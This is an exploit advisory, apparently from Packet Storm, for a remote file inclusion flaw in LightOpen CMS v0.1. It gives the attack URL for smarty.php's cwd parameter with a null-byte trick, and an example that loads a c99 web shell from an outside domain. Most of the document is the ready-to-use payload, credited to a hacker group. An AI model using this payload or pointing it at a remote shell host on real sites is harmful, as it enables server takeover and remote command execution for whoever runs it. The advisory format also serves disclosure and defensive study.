LightOpen CMS suffers from a remote file inclusion vulnerability. Same vulnerability as the local file inclusion discovered in June, 2009.
8a7b609eb30a9f0178802388ff057b08a22313a3f31beb1eb0c4a8bb244a2354# Exploit Title: LightOpen CMS Remote File Inclusion (smarty.php)
# Date: 2010-01-05
# Author: Zer0 Thunder
# Software Link: http://sourceforge.net/projects/lightopencms/
# Version: v0.1
# Tested on: Windows XP sp2 [Wamp]
# CVE :
# Code :
Exploit :
http://site.com/path/smarty.php?cwd=[shell.txt]?%00
Example :
http://localhost/locms/smarty.php?cwd=http://www.cfsm.cn/c99.txt?%00
########################################
# MSN : zer0_thunder@colombohackers.com
# Email : neonwarlock@live.com
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
########################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed